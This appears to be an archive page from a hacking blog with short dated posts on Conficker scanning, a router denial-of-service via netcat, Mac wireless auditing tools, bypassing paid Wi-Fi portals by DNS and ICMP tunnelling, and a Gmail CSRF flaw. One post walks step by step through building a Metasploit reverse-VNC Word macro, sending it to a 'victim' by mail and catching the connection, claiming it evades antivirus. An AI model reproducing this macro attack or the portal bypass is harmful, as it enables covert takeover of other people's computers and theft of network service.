Download the new Version of Nmap
usage Command
nmap -PN -T4 -p139,445 -n -v –script=smb-check-vulns –script-args safe=1 [targetnetworks]
Mar
31
Nessus plugin #36036 performs a network based check for Windows computers infected with a variant of the Conficker virus. The scan does not need credentials, but does require ports 445 or 139 to be open between the Nessus scanner and your scanned systems. The plugin is based on research from the University of Bonn in Germany.
Conficker exploits Windows systems vulnerable to MS08-067. Tenable has worked with many organizations to help them perform both un-credentialed network scans and credentialed patch audits with Nessus to find systems that are still vulnerable. We wrote a blog about our typical experiences working with customers performing these scans
Mar
30
Tillmann and Felix have their own proof of concept scanner to detect Conficker Virus which r affected in the network, U can download the python scanner here
http://iv.cs.uni-bonn.de/uploads/media/scs.zip
Mar
24
After establishing a tcp connection to the affected device on port 53 from the LAN interface and after closing the connection the router will restart.
Sometimes when using the web trigger with Internet explorer the WAN configuration (ip, gateway ip, dns servers) for the device was lost and a hardware reset was needed in order to make the device usable again.
This issue can be triggered from the LAN interface by direct connection or by using specially crafted web content. For the web content to be able to trigger the issue a browser withouth security restrictions on connection to port 53 must be used, the tests done shows Internet Explorer like the only one cappable of activating the bug.
Steps to reproduce:
# direct connection
# nc -nvv 192.168.1.1 53 more
Mar
22
I was just thinking about windows Wifi snags and its audits, now i got some info about the Mac Wifi stuff so letting you people know about it,
Viha is a project developing a suite of wireless auditing tools for MacOS X. So far, the only components developed are a custom AirPort driver for monitor mode packet capture, a framework for driver access and 802.11 packet deconstruction, and a command-line wireless network stumbler. Because OS X before 10.2 (Jaguar) doesn’t allow us to dynamically unload/load the Apple AirPort driver, we require OS X 10.2 for now.
They are GPL’ing everything for the newer releases, so the 0.0.1a release is binary-only, but the 0.0.2 releases will be under the GNU General Public License. To assist in using the driver in other projects, it will be available separately while the “Tools” release includes everything else (including the driver).
The 0.0.1a release is a bugfix to correct a memory leak in IEEE80211Frame , (thanks to Michael Rossberg (aziel@gmx.net) for reporting it, check out his awesome AQUA STUMBLER.
you can download and get more info of Viha here
Mar
21
One of the frustrating things while traveling is Obvious pay for Wireless at airport and hotels , If you check your mail at the airport and again at the hotel, which runs up the charges of your personnel one months broadband connection, and not to forget to mention that you have to give your credit card to an unknown access provider affiliate.
There are two traditional ways of getting around the captive portal: tunneling IP over DNS and tunneling IP over ICMP.
In most situations, the firewall will be set up to block or proxy all TCP traffic, and all HTTP requests are redirected to the authentication server that wants you to enter a credit card. DNS lookups and ICMP traffic (ping, for example) are quite often left untouched, however, allowing you to use these services to move data through a remote computer under your control.
The basic setup is the same for both scenarios, and you can use the same server as a DNS and ICMP proxy. All you’ll need is a public DNS server that you can manage and another server with a static IP that you can access remotely. Thomer Gil has written two excellent howtos, one for using NSTX (IP-over-DNS), and the other for using ICMPTX (IP-over-ICMP). Follow the guides, install and configure the two packages, and you can get free access in a pinch from just about anywhere.
NSTX (IP-over-DNS) HOWTO
ICMPTX (IP-over-ICMP) HOWTO
Have fun
Mar
17
Mar
6
Thanks to MatToufoutu for the his guide i just made a POC video
Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be
hidden in a Word file and get VNC desktop of the remote user
Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect It,
there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router
Lets begin
1) Create a Macro to Intergate with word
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas
2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system
3)now in Backtrack type this command
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E
When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
Video link for the above guide
WirelessPunter
Mar
5
Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts.
GMail is vulnerable to CSRF attacks in the “Change Password” functionality. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.
An attacker can create a page that includes requests to the “Change password” functionality of GMail and modify the passwords of the users who, being authenticated, visit the page of the attacker.
The attack is facilitated since the “Change Password” request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the “Change Password” form POC